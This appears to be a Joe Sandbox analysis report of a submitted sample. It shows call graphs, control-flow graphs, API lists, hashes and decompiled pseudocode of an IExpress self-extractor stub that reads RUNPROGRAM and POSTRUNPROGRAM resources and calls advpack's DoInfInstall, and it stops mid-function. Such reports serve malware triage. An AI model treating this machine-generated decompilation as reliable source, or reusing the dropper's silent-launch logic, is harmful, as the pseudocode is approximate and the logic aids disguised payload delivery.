3111->3114 3115 94663d 3111->3115 3112->3110 3112->3111 3113->3115 3114->3113 3114->3115 3115->3101 3117 944132 3116->3117 3119 94412a 3116->3119 3120 941ea7 3117->3120 3119->3056 3121 941ed3 3120->3121 3122 941eba 3120->3122 3121->3119 3123 94256d 15 API calls 3122->3123 3123->3121 3125 942026 3124->3125 3126 941ff0 RegOpenKeyExA 3124->3126 3125->2480 3126->3125 3127 94200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3275 9419e0 3276 941a24 GetDesktopWindow 3275->3276 3277 941a03 3275->3277 3278 9443d0 11 API calls 3276->3278 3279 941a16 EndDialog 3277->3279 3280 941a20 3277->3280 3281 941a33 LoadStringA SetDlgItemTextA MessageBeep 3278->3281 3279->3280 3282 946ce0 4 API calls 3280->3282 3281->3280 3283 941a7e 3282->3283 3284 946a20 __getmainargs 3285 946bef _XcptFilter

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00946495 13 Function_00941781 0->13 16 Function_0094658A 0->16 56 Function_00946CE0 0->56 1 Function_00941F90 22 Function_009444B9 1->22 24 Function_00941EA7 1->24 1->56 2 Function_00942390 2->2 12 Function_00941680 2->12 2->16 20 Function_009416B3 2->20 2->56 3 Function_00946793 4 Function_00945C9E 4->12 4->16 4->22 43 Function_009466C8 4->43 55 Function_009431E0 4->55 4->56 70 Function_00945C17 4->70 95 Function_00946E2A 4->95 108 Function_0094667F 4->108 5 Function_00946298 5->56 76 Function_0094171E 5->76 6 Function_00944E99 6->12 7 Function_00941A84 7->108 8 Function_00946285 9 Function_00946380 10 Function_00943680 11 Function_00944980 11->22 109 Function_0094487A 11->109 12->13 14 Function_0094468F 15 Function_00942A89 16->20 17 Function_0094268B 17->22 17->56 17->76 18 Function_009452B6 18->2 18->13 18->56 60 Function_00941FE1 18->60 68 Function_009465E8 18->68 19 Function_009469B0 21 Function_00946FBE 19->21 64 Function_009471EF 19->64 81 Function_00947000 19->81 105 Function_00946C70 19->105 20->13 96 Function_00946F54 21->96 22->12 45 Function_009467C9 22->45 22->56 22->76 77 Function_0094681F 22->77 23 Function_00946FA5 102 Function_0094724D 23->102 117 Function_0094256D 24->117 25 Function_00944CA0 26 Function_009455A0 26->8 26->13 26->14 26->16 26->22 26->56 71 Function_00946517 26->71 87 Function_00942630 26->87 100 Function_00946952 26->100 107 Function_0094597D 26->107 111 Function_00945467 26->111 27 Function_009453A1 27->12 27->16 27->56 27->76 28 Function_00946FA1 29 Function_00943BA2 29->0 29->8 29->13 29->14 29->22 29->56 63 Function_00943FEF 29->63 66 Function_00941AE8 29->66 94 Function_0094202A 29->94 112 Function_00942267 29->112 30 Function_009472A2 31 Function_009418A3 31->56 62 Function_009417EE 31->62 32 Function_00942AAC 32->12 44 Function_009417C8 32->44 32->56 32->68 33 Function_009466AE 34 Function_00942CAA 34->2 34->4 34->14 34->22 34->31 34->56 61 Function_009436EE 34->61 34->71 35 Function_00944AD0 35->10 36 Function_00944CD0 36->6 36->11 36->56 58 Function_009447E0 36->58 82 Function_00944702 36->82 86 Function_00944C37 36->86 113 Function_00944B60 36->113 118 Function_0094476D 36->118 37 Function_009443D0 37->56 38 Function_00944CC0 39 Function_00944BC0 40 Function_009430C0 41 Function_009463C0 41->13 41->16 41->56 42 Function_009458C8 42->8 42->12 42->16 42->22 103 Function_00946648 43->103 45->3 46 Function_00946CF0 47 Function_009434F0 47->10 47->22 47->37 48 Function_00946EF0 49 Function_00944EFD 49->11 49->56 49->113 50 Function_009470FE 51 Function_009466F9 52 Function_00942BFB 52->1 52->18 52->34 74 Function_00942F1D 52->74 53 Function_009451E5 53->8 53->14 53->22 54 Function_00944FE0 54->14 54->22 54->49 56->46 57 Function_009424E0 57->16 57->56 58->12 58->22 59 Function_009419E0 59->37 59->56 61->15 61->22 61->45 61->56 67 Function_009428E8 61->67 61->77 62->56 63->8 63->22 63->56 78 Function_0094411B 63->78 65 Function_00946BEF 66->7 66->12 66->13 66->16 66->20 66->22 66->32 66->43 66->56 66->76 67->15 106 Function_00942773 67->106 69 Function_009470EB 71->22 72 Function_00947010 73 Function_00943210 73->16 73->22 73->37 73->42 90 Function_00944224 73->90 73->107 74->8 74->16 74->22 74->26 74->29 74->53 74->56 75 Function_0094621E 74->75 88 Function_00943A3F 74->88 91 Function_00943B26 74->91 110 Function_00945164 74->110 74->117 119 Function_00944169 74->119 75->8 75->22 75->56 75->107 77->51 77->56 78->24 79 Function_00943100 79->37 80 Function_00944200 82->12 82->20 83 Function_00946C03 83->102 84 Function_0094490C 85 Function_00947208 87->22 87->56 88->8 88->14 88->22 88->71 89 Function_00946C3F 90->12 90->22 91->5 91->54 91->71 92 Function_00947120 93 Function_00946A20 94->16 94->22 94->56 94->76 95->46 96->85 96->102 97 Function_00947155 98 Function_00944A50 99 Function_00943450 99->37 101 Function_00946F40 104 Function_00947270 106->12 106->13 106->16 106->56 107->8 107->17 107->22 107->56 108->103 109->84 110->5 110->14 110->22 111->8 111->12 111->13 111->16 111->27 111->42 111->56 111->107 112->16 112->56 112->76 114 Function_00946A60 114->52 114->85 114->89 114->97 114->102 115 Function_00947060 114->115 115->72 115->92 116 Function_00946760 117->57 118->33 118->71 119->14 119->22

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 36 943ba2-943bd9 37 943bfd-943bff 36->37 38 943bdb-943bee call 94468f 36->38 40 943c03-943c28 memset 37->40 44 943bf4-943bf7 38->44 45 943d13-943d30 call 9444b9 38->45 42 943d35-943d48 call 941781 40->42 43 943c2e-943c40 call 94468f 40->43 49 943d4d-943d52 42->49 43->45 54 943c46-943c49 43->54 44->37 44->45 55 943f4d 45->55 52 943d54-943d6c call 94468f 49->52 53 943d9e-943db6 call 941ae8 49->53 52->45 65 943d6e-943d75 52->65 53->55 69 943dbc-943dc2 53->69 54->45 57 943c4f-943c56 54->57 59 943f4f-943f63 call 946ce0 55->59 61 943c60-943c65 57->61 62 943c58-943c5e 57->62 67 943c75-943c7c 61->67 68 943c67-943c6d 61->68 66 943c6e-943c73 62->66 75 943fda-943fe1 65->75 76 943d7b-943d98 CompareStringA 65->76 70 943c87-943c89 66->70 67->70 73 943c7e-943c82 67->73 68->66 71 943dc4-943dce 69->71 72 943de6-943de8 69->72 70->49 78 943c8f-943c98 70->78 71->72 77 943dd0-943dd7 71->77 79 943dee-943df5 72->79 80 943f0b-943f15 call 943fef 72->80 73->70 81 943fe3 call 942267 75->81 82 943fe8-943fea 75->82 76->53 76->75 77->72 84 943dd9-943ddb 77->84 85 943cf1-943cf3 78->85 86 943c9a-943c9c 78->86 87 943fab-943fd2 call 9444b9 LocalFree 79->87 88 943dfb-943dfd 79->88 90 943f1a-943f1c 80->90 81->82 82->59 84->79 91 943ddd-943de1 call 94202a 84->91 85->53 96 943cf9-943d11 call 94468f 85->96 93 943ca5-943ca7 86->93 94 943c9e-943ca3 86->94 87->55 88->80 95 943e03-943e0a 88->95 97 943f46-943f47 LocalFree 90->97 98 943f1e-943f2d LocalFree 90->98 91->72 93->55 102 943cad 93->102 101 943cb2-943cc5 call 94468f 94->101 95->80 103 943e10-943e19 call 946495 95->103 96->45 96->49 97->55 106 943fd7-943fd9 98->106 107 943f33-943f3b 98->107 101->45 112 943cc7-943ce8 CompareStringA 101->112 102->101 113 943f92-943fa9 call 9444b9 103->113 114 943e1f-943e36 GetProcAddress 103->114 106->75 107->40 112->85 116 943cea-943ced 112->116 125 943f7c-943f90 LocalFree call 946285 113->125 117 943f64-943f76 call 9444b9 FreeLibrary 114->117 118 943e3c-943e80 114->118 116->85 117->125 121 943e82-943e87 118->121 122 943e8b-943e94 118->122 121->122 123 943e96-943e9b 122->123 124 943e9f-943ea2 122->124 123->124 127 943ea4-943ea9 124->127 128 943ead-943eb6 124->128 125->55 127->128 130 943ec1-943ec3 128->130 131 943eb8-943ebd 128->131 133 943ec5-943eca 130->133 134 943ece-943eec 130->134 131->130 133->134 137 943ef5-943efd 134->137 138 943eee-943ef3 134->138 139 943f40 FreeLibrary 137->139 140 943eff-943f09 FreeLibrary 137->140 138->137 139->97 140->98
                            C-Code - Quality: 82%
                            			E00943BA2() {
                            				signed int _v8;
                            				signed int _v12;
                            				char _v276;
                            				char _v280;
                            				short _v300;
                            				intOrPtr _v304;
                            				void _v348;
                            				char _v352;
                            				intOrPtr _v356;
                            				signed int _v360;
                            				short _v364;
                            				char* _v368;
                            				intOrPtr _v372;
                            				void* _v376;
                            				intOrPtr _v380;
                            				char _v384;
                            				signed int _v388;
                            				intOrPtr _v392;
                            				signed int _v396;
                            				signed int _v400;
                            				signed int _v404;
                            				void* _v408;
                            				void* _v424;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t69;
                            				signed int _t76;
                            				void* _t77;
                            				signed int _t79;
                            				short _t96;
                            				signed int _t97;
                            				intOrPtr _t98;
                            				signed int _t101;
                            				signed int _t104;
                            				signed int _t108;
                            				int _t112;
                            				void* _t115;
                            				signed char _t118;
                            				void* _t125;
                            				signed int _t127;
                            				void* _t128;
                            				struct HINSTANCE__* _t129;
                            				void* _t130;
                            				short _t137;
                            				char* _t140;
                            				signed char _t144;
                            				signed char _t145;
                            				signed int _t149;
                            				void* _t150;
                            				void* _t151;
                            				signed int _t153;
                            				void* _t155;
                            				void* _t156;
                            				signed int _t157;
                            				signed int _t162;
                            				signed int _t164;
                            				void* _t165;
                            
                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                            				_t69 =  *0x948004; // 0xec518a5e
                            				_v8 = _t69 ^ _t164;
                            				_t153 = 0;
                            				 *0x949124 =  *0x949124 & 0;
                            				_t149 = 0;
                            				_v388 = 0;
                            				_v384 = 0;
                            				_t165 =  *0x948a28 - _t153; // 0x0
                            				if(_t165 != 0) {
                            					L3:
                            					_t127 = 0;
                            					_v392 = 0;
                            					while(1) {
                            						_v400 = _v400 & 0x00000000;
                            						memset( &_v348, 0, 0x44);
                            						_t164 = _t164 + 0xc;
                            						_v348 = 0x44;
                            						if( *0x948c42 != 0) {
                            							goto L26;
                            						}
                            						_t146 =  &_v396;
                            						_t115 = E0094468F("SHOWWINDOW",  &_v396, 4);
                            						if(_t115 == 0 || _t115 > 4) {
                            							L25:
                            							_t146 = 0x4b1;
                            							E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
                            							 *0x949124 = 0x80070714;
                            							goto L62;
                            						} else {
                            							if(_v396 != 1) {
                            								__eflags = _v396 - 2;
                            								if(_v396 != 2) {
                            									_t137 = 3;
                            									__eflags = _v396 - _t137;
                            									if(_v396 == _t137) {
                            										_v304 = 1;
                            										_v300 = _t137;
                            									}
                            									goto L14;
                            								}
                            								_push(6);
                            								_v304 = 1;
                            								_pop(0);
                            								goto L11;
                            							} else {
                            								_v304 = 1;
                            								L11:
                            								_v300 = 0;
                            								L14:
                            								if(_t127 != 0) {
                            									L27:
                            									_t155 = 1;
                            									__eflags = _t127 - 1;
                            									if(_t127 != 1) {
                            										L31:
                            										_t132 =  &_v280;
                            										_t76 = E00941AE8( &_v280,  &_v408,  &_v404); // executed
                            										__eflags = _t76;
                            										if(_t76 == 0) {
                            											L62:
                            											_t77 = 0;
                            											L63:
                            											_pop(_t150);
                            											_pop(_t156);
                            											_pop(_t128);
                            											return E00946CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                            										}
                            										_t157 = _v404;
                            										__eflags = _t149;
                            										if(_t149 != 0) {
                            											L37:
                            											__eflags = _t157;
                            											if(_t157 == 0) {
                            												L57:
                            												_t151 = _v408;
                            												_t146 =  &_v352;
                            												_t130 = _t151; // executed
                            												_t79 = E00943FEF(_t130,  &_v352); // executed
                            												__eflags = _t79;
                            												if(_t79 == 0) {
                            													L61:
                            													LocalFree(_t151);
                            													goto L62;
                            												}
                            												L58:
                            												LocalFree(_t151);
                            												_t127 = _t127 + 1;
                            												_v396 = _t127;
                            												__eflags = _t127 - 2;
                            												if(_t127 >= 2) {
                            													_t155 = 1;
                            													__eflags = 1;
                            													L69:
                            													__eflags =  *0x948580;
                            													if( *0x948580 != 0) {
                            														E00942267();
                            													}
                            													_t77 = _t155;
                            													goto L63;
                            												}
                            												_t153 = _v392;
                            												_t149 = _v388;
                            												continue;
                            											}
                            											L38:
                            											__eflags =  *0x948180;
                            											if( *0x948180 == 0) {
                            												_t146 = 0x4c7;
                            												E009444B9(0, 0x4c7, 0, 0, 0x10, 0);
                            												LocalFree(_v424);
                            												 *0x949124 = 0x8007042b;
                            												goto L62;
                            											}
                            											__eflags = _t157;
                            											if(_t157 == 0) {
                            												goto L57;
                            											}
                            											__eflags =  *0x949a34 & 0x00000004;
                            											if(__eflags == 0) {
                            												goto L57;
                            											}
                            											_t129 = E00946495(_t127, _t132, _t157, __eflags);
                            											__eflags = _t129;
                            											if(_t129 == 0) {
                            												_t146 = 0x4c8;
                            												E009444B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                            												L65:
                            												LocalFree(_v408);
                            												 *0x949124 = E00946285();
                            												goto L62;
                            											}
                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                            											_v404 = _t146;
                            											__eflags = _t146;
                            											if(_t146 == 0) {
                            												_t146 = 0x4c9;
                            												__eflags = 0;
                            												E009444B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                            												FreeLibrary(_t129);
                            												goto L65;
                            											}
                            											__eflags =  *0x948a30;
                            											_t151 = _v408;
                            											_v384 = 0;
                            											_v368 =  &_v280;
                            											_t96 =  *0x949a40; // 0x3
                            											_v364 = _t96;
                            											_t97 =  *0x948a38 & 0x0000ffff;
                            											_v380 = 0x949154;
                            											_v376 = _t151;
                            											_v372 = 0x9491e4;
                            											_v360 = _t97;
                            											if( *0x948a30 != 0) {
                            												_t97 = _t97 | 0x00010000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											_t144 =  *0x949a34; // 0x1
                            											__eflags = _t144 & 0x00000008;
                            											if((_t144 & 0x00000008) != 0) {
                            												_t97 = _t97 | 0x00020000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											__eflags = _t144 & 0x00000010;
                            											if((_t144 & 0x00000010) != 0) {
                            												_t97 = _t97 | 0x00040000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											_t145 =  *0x948d48; // 0x0
                            											__eflags = _t145 & 0x00000040;
                            											if((_t145 & 0x00000040) != 0) {
                            												_t97 = _t97 | 0x00080000;
                            												__eflags = _t97;
                            												_v360 = _t97;
                            											}
                            											__eflags = _t145;
                            											if(_t145 < 0) {
                            												_t104 = _t97 | 0x00100000;
                            												__eflags = _t104;
                            												_v360 = _t104;
                            											}
                            											_t98 =  *0x949a38; // 0x0
                            											_v356 = _t98;
                            											_t130 = _t146;
                            											 *0x94a288( &_v384);
                            											_t101 = _v404();
                            											__eflags = _t164 - _t164;
                            											if(_t164 != _t164) {
                            												_t130 = 4;
                            												asm("int 0x29");
                            											}
                            											 *0x949124 = _t101;
                            											_push(_t129);
                            											__eflags = _t101;
                            											if(_t101 < 0) {
                            												FreeLibrary();
                            												goto L61;
                            											} else {
                            												FreeLibrary();
                            												_t127 = _v400;
                            												goto L58;
                            											}
                            										}
                            										__eflags =  *0x949a40 - 1; // 0x3
                            										if(__eflags == 0) {
                            											goto L37;
                            										}
                            										__eflags =  *0x948a20;
                            										if( *0x948a20 == 0) {
                            											goto L37;
                            										}
                            										__eflags = _t157;
                            										if(_t157 != 0) {
                            											goto L38;
                            										}
                            										_v388 = 1;
                            										E0094202A(_t146); // executed
                            										goto L37;
                            									}
                            									_t146 =  &_v280;
                            									_t108 = E0094468F("POSTRUNPROGRAM",  &_v280, 0x104);
                            									__eflags = _t108;
                            									if(_t108 == 0) {
                            										goto L25;
                            									}
                            									__eflags =  *0x948c42;
                            									if( *0x948c42 != 0) {
                            										goto L69;
                            									}
                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                            									__eflags = _t112 == 0;
                            									if(_t112 == 0) {
                            										goto L69;
                            									}
                            									goto L31;
                            								}
                            								_t118 =  *0x948a38; // 0x0
                            								if(_t118 == 0) {
                            									L23:
                            									if(_t153 != 0) {
                            										goto L31;
                            									}
                            									_t146 =  &_v276;
                            									if(E0094468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                            										goto L27;
                            									}
                            									goto L25;
                            								}
                            								if((_t118 & 0x00000001) == 0) {
                            									__eflags = _t118 & 0x00000002;
                            									if((_t118 & 0x00000002) == 0) {
                            										goto L62;
                            									}
                            									_t140 = "USRQCMD";
                            									L20:
                            									_t146 =  &_v276;
                            									if(E0094468F(_t140,  &_v276, 0x104) == 0) {
                            										goto L25;
                            									}
                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                            										_t153 = 1;
                            										_v388 = 1;
                            									}
                            									goto L23;
                            								}
                            								_t140 = "ADMQCMD";
                            								goto L20;
                            							}
                            						}
                            						L26:
                            						_push(_t130);
                            						_t146 = 0x104;
                            						E00941781( &_v276, 0x104, _t130, 0x948c42);
                            						goto L27;
                            					}
                            				}
                            				_t130 = "REBOOT";
                            				_t125 = E0094468F(_t130, 0x949a2c, 4);
                            				if(_t125 == 0 || _t125 > 4) {
                            					goto L25;
                            				} else {
                            					goto L3;
                            				}
                            			}





























































                            0x00943baa
                            0x00943bb0
                            0x00943bb7
                            0x00943bc0
                            0x00943bc2
                            0x00943bc9
                            0x00943bcb
                            0x00943bcf
                            0x00943bd3
                            0x00943bd9
                            0x00943bfd
                            0x00943bfd
                            0x00943bff
                            0x00943c03
                            0x00943c03
                            0x00943c11
                            0x00943c16
                            0x00943c19
                            0x00943c28
                            0x00000000
                            0x00000000
                            0x00943c30
                            0x00943c39
                            0x00943c40
                            0x00943d13
                            0x00943d15
                            0x00943d21
                            0x00943d26
                            0x00000000
                            0x00943c4f
                            0x00943c56
                            0x00943c60
                            0x00943c65
                            0x00943c77
                            0x00943c78
                            0x00943c7c
                            0x00943c7e
                            0x00943c82
                            0x00943c82
                            0x00000000
                            0x00943c7c
                            0x00943c67
                            0x00943c69
                            0x00943c6d
                            0x00000000
                            0x00943c58
                            0x00943c58
                            0x00943c6e
                            0x00943c6e
                            0x00943c87
                            0x00943c89
                            0x00943d4d
                            0x00943d4f
                            0x00943d50
                            0x00943d52
                            0x00943d9e
                            0x00943da8
                            0x00943daf
                            0x00943db4
                            0x00943db6
                            0x00943f4d
                            0x00943f4d
                            0x00943f4f
                            0x00943f56
                            0x00943f57
                            0x00943f58
                            0x00943f63
                            0x00943f63
                            0x00943dbc
                            0x00943dc0
                            0x00943dc2
                            0x00943de6
                            0x00943de6
                            0x00943de8
                            0x00943f0b
                            0x00943f0b
                            0x00943f0f
                            0x00943f13
                            0x00943f15
                            0x00943f1a
                            0x00943f1c
                            0x00943f46
                            0x00943f47
                            0x00000000
                            0x00943f47
                            0x00943f1e
                            0x00943f1f
                            0x00943f25
                            0x00943f26
                            0x00943f2a
                            0x00943f2d
                            0x00943fd9
                            0x00943fd9
                            0x00943fda
                            0x00943fda
                            0x00943fe1
                            0x00943fe3
                            0x00943fe3
                            0x00943fe8
                            0x00000000
                            0x00943fe8
                            0x00943f33
                            0x00943f37
                            0x00000000
                            0x00943f37
                            0x00943dee
                            0x00943dee
                            0x00943df5
                            0x00943fad
                            0x00943fb9
                            0x00943fc2
                            0x00943fc8
                            0x00000000
                            0x00943fc8
                            0x00943dfb
                            0x00943dfd
                            0x00000000
                            0x00000000
                            0x00943e03
                            0x00943e0a
                            0x00000000
                            0x00000000
                            0x00943e15
                            0x00943e17
                            0x00943e19
                            0x00943f94
                            0x00943fa4
                            0x00943f7c
                            0x00943f80
                            0x00943f8b
                            0x00000000
                            0x00943f8b
                            0x00943e2c
                            0x00943e30
                            0x00943e34
                            0x00943e36
                            0x00943f69
                            0x00943f6e
                            0x00943f70
                            0x00943f76
                            0x00000000
                            0x00943f76
                            0x00943e3c
                            0x00943e43
                            0x00943e47
                            0x00943e52
                            0x00943e56
                            0x00943e5c
                            0x00943e61
                            0x00943e68
                            0x00943e70
                            0x00943e74
                            0x00943e7c
                            0x00943e80
                            0x00943e82
                            0x00943e82
                            0x00943e87
                            0x00943e87
                            0x00943e8b
                            0x00943e91
                            0x00943e94
                            0x00943e96
                            0x00943e96
                            0x00943e9b
                            0x00943e9b
                            0x00943e9f
                            0x00943ea2
                            0x00943ea4
                            0x00943ea4
                            0x00943ea9
                            0x00943ea9
                            0x00943ead
                            0x00943eb3
                            0x00943eb6
                            0x00943eb8
                            0x00943eb8
                            0x00943ebd
                            0x00943ebd
                            0x00943ec1
                            0x00943ec3
                            0x00943ec5
                            0x00943ec5
                            0x00943eca
                            0x00943eca
                            0x00943ece
                            0x00943ed5
                            0x00943ed9
                            0x00943ee0
                            0x00943ee6
                            0x00943eea
                            0x00943eec
                            0x00943eee
                            0x00943ef3
                            0x00943ef3
                            0x00943ef5
                            0x00943efa
                            0x00943efb
                            0x00943efd
                            0x00943f40
                            0x00000000
                            0x00943eff
                            0x00943eff
                            0x00943f05
                            0x00000000
                            0x00943f05
                            0x00943efd
                            0x00943dc7
                            0x00943dce
                            0x00000000
                            0x00000000
                            0x00943dd0
                            0x00943dd7
                            0x00000000
                            0x00000000
                            0x00943dd9
                            0x00943ddb
                            0x00000000
                            0x00000000
                            0x00943ddd
                            0x00943de1
                            0x00000000
                            0x00943de1
                            0x00943d59
                            0x00943d65
                            0x00943d6a
                            0x00943d6c
                            0x00000000
                            0x00000000
                            0x00943d6e
                            0x00943d75
                            0x00000000
                            0x00000000
                            0x00943d8f
                            0x00943d96
                            0x00943d98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00943d98
                            0x00943c8f
                            0x00943c98
                            0x00943cf1
                            0x00943cf3
                            0x00000000
                            0x00000000
                            0x00943cfe
                            0x00943d11
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00943d11
                            0x00943c9c
                            0x00943ca5
                            0x00943ca7
                            0x00000000
                            0x00000000
                            0x00943cad
                            0x00943cb2
                            0x00943cb7
                            0x00943cc5
                            0x00000000
                            0x00000000
                            0x00943ce8
                            0x00943cec
                            0x00943ced
                            0x00943ced
                            0x00000000
                            0x00943ce8
                            0x00943c9e
                            0x00000000
                            0x00943c9e
                            0x00943c56
                            0x00943d35
                            0x00943d35
                            0x00943d3c
                            0x00943d48
                            0x00000000
                            0x00943d48
                            0x00943c03
                            0x00943be2
                            0x00943be7
                            0x00943bee
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 00943C11
                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00943CDC
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                              • Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                              • Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                              • Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                              • Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
                              • Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00948C42), ref: 00943D8F
                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00943E26
                            • FreeLibrary.KERNEL32(00000000,?,00948C42), ref: 00943EFF
                            • LocalFree.KERNEL32(?,?,?,?,00948C42), ref: 00943F1F
                            • FreeLibrary.KERNEL32(00000000,?,00948C42), ref: 00943F40
                            • LocalFree.KERNEL32(?,?,?,?,00948C42), ref: 00943F47
                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00948C42), ref: 00943F76
                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00948C42), ref: 00943F80
                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00948C42), ref: 00943FC2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                            • API String ID: 1032054927-384775695
                            • Opcode ID: 48143cdb57b994c5c1651c4194734f2609eb04023c292cf5429943576956a52b
                            • Instruction ID: 2ba67fc15af1ed057ccbea65ce6a79c3e7c7d1614b8012b60a875f536a2c0588
                            • Opcode Fuzzy Hash: 48143cdb57b994c5c1651c4194734f2609eb04023c292cf5429943576956a52b
                            • Instruction Fuzzy Hash: 9DB102749183019BE730DF348845F6B77E8EB96704F108A2DFA95D61E0EB74CA44DB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 141 941ae8-941b2c call 941680 144 941b2e-941b39 141->144 145 941b3b-941b40 141->145 146 941b46-941b61 call 941a84 144->146 145->146 149 941b63-941b65 146->149 150 941b9f-941bc2 call 941781 call 94658a 146->150 151 941b68-941b6d 149->151 157 941bc7-941bd3 call 9466c8 150->157 151->151 154 941b6f-941b74 151->154 154->150 156 941b76-941b7b 154->156 158 941b83-941b86 156->158 159 941b7d-941b81 156->159 165 941d73-941d7f call 9466c8 157->165 166 941bd9-941bf1 CompareStringA 157->166 158->150 162 941b88-941b8a 158->162 159->158 161 941b8c-941b9d call 941680 159->161 161->157 162->150 162->161 175 941d81-941d99 CompareStringA 165->175 176 941df8-941e09 LocalAlloc 165->176 166->165 168 941bf7-941c07 GetFileAttributesA 166->168 170 941d53-941d5e 168->170 171 941c0d-941c15 168->171 173 941d64-941d6e call 9444b9 170->173 171->170 174 941c1b-941c33 call 941a84 171->174 188 941e94-941ea4 call 946ce0 173->188 190 941c35-941c38 174->190 191 941c50-941c61 LocalAlloc 174->191 175->176 181 941d9b-941da2 175->181 178 941dd4-941ddf 176->178 179 941e0b-941e1b GetFileAttributesA 176->179 178->173 183 941e67-941e73 call 941680 179->183 184 941e1d-941e1f 179->184 186 941da5-941daa 181->186 194 941e78-941e84 call 942aac 183->194 184->183 189 941e21-941e3e call 941781 184->189 186->186 192 941dac-941db4 186->192 189->194 210 941e40-941e43 189->210 197 941c40-941c4b call 941a84 190->197 198 941c3a 190->198 191->178 193 941c67-941c72 191->193 199 941db7-941dbc 192->199 200 941c74 193->200 201 941c79-941cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->201 209 941e89-941e92 194->209 197->191 198->197 199->199 206 941dbe-941dd2 LocalAlloc 199->206 200->201 207 941cc2-941ccc 201->207 208 941cf8-941d07 201->208 206->178 211 941de1-941df3 call 94171e 206->211 213 941cd3-941cf3 call 941680 * 2 207->213 214 941cce 207->214 216 941d23 208->216 217 941d09-941d21 GetShortPathNameA 208->217 209->188 210->194 215 941e45-941e65 call 9416b3 * 2 210->215 211->209 213->209 214->213 215->194 221 941d28-941d2b 216->221 217->221 224 941d32-941d4e call 94171e 221->224 225 941d2d 221->225 224->209 225->224
                            C-Code - Quality: 82%
                            			E00941AE8(long __ecx, CHAR** _a4, int* _a8) {
                            				signed int _v8;
                            				char _v268;
                            				char _v527;
                            				char _v528;
                            				char _v1552;
                            				CHAR* _v1556;
                            				int* _v1560;
                            				CHAR** _v1564;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t48;
                            				CHAR* _t53;
                            				CHAR* _t54;
                            				char* _t57;
                            				char* _t58;
                            				CHAR* _t60;
                            				void* _t62;
                            				signed char _t65;
                            				intOrPtr _t76;
                            				intOrPtr _t77;
                            				unsigned int _t85;
                            				CHAR* _t90;
                            				CHAR* _t92;
                            				char _t105;
                            				char _t106;
                            				CHAR** _t111;
                            				CHAR* _t115;
                            				intOrPtr* _t125;
                            				void* _t126;
                            				CHAR* _t132;
                            				CHAR* _t135;
                            				void* _t138;
                            				void* _t139;
                            				void* _t145;
                            				intOrPtr* _t146;
                            				char* _t148;
                            				CHAR* _t151;
                            				void* _t152;
                            				CHAR* _t155;
                            				CHAR* _t156;
                            				void* _t157;
                            				signed int _t158;
                            
                            				_t48 =  *0x948004; // 0xec518a5e
                            				_v8 = _t48 ^ _t158;
                            				_t108 = __ecx;
                            				_v1564 = _a4;
                            				_v1560 = _a8;
                            				E00941680( &_v528, 0x104, __ecx);
                            				if(_v528 != 0x22) {
